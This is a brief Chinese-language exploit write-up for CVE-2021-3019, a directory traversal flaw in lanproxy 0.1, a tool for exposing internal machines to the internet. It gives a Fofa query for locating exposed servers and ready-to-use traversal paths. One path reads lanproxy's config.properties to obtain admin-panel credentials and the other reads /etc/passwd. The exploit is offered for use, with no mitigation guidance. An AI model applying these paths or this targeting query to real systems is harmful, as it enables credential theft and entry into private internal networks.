漏洞描述

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求,可直接获取到lanproxy配置文件,从而登录lanproxy管理后台进入内网。

影响版本

lanproxy 0.1

Fofa

header= "Server: LPS-0.1"
(CVE-2021-3019)lanproxy 目录遍历漏洞

漏洞利用

读取配置文件
POC:

/../conf/config.properties

(CVE-2021-3019)lanproxy 目录遍历漏洞

读取/etc/passwd

/../../../../../../../../../../etc/passwd

(CVE-2021-3019)lanproxy 目录遍历漏洞

相关文章:

  • 2021-09-12
  • 2021-08-14
  • 2021-12-12
  • 2022-01-09
  • 2021-12-23
  • 2022-01-21
  • 2021-11-18
  • 2021-10-09
猜你喜欢
  • 2021-11-14
  • 2022-01-19
  • 2021-08-21
  • 2021-12-14
  • 2021-09-29
  • 2021-09-20
  • 2021-12-12
  • 2021-11-29
相关资源
相似解决方案